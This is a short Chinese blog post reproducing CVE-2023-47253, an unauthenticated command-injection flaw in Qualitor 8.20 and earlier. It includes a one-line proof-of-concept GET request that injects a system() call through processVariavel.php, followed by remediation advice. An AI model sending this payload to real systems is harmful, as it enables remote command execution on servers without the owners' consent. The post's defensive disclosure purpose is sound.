博客
关于我
Qualitor processVariavel.php 未授权命令注入漏洞复现(CVE-2023-47253)
阅读量:794 次
发布时间:2023-03-03

本文共 393 字,大约阅读时间需要 1 分钟。

Qualitor 8.20及之前版本漏洞详解

漏洞概述

Qualitor 8.20及之前版本存在严重的命令注入漏洞。远程攻击者可利用此漏洞通过PHP代码执行任意操作,威胁系统安全。

复现环境

  • 应用名称:Qualitor-Web
  • 版本:8.20及之前版本

漏洞复现

通过以下PoC(Proof of Concept)验证漏洞:

GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system("dir")

修复建议

  • 限制接口访问权限:只允许经过认证的用户或IP访问关键功能模块。
  • 升级软件版本:立即升级至最新安全版本,Qualitor官方已发布修复包。
  • 审查并限制外部接口:对不必要的网络接口进行关闭或权限限制。
  • 定期安全审计:检测系统漏洞并及时修复,确保数据和应用安全。
  • 转载地址:http://qkxfk.baihongyu.com/

    你可能感兴趣的文章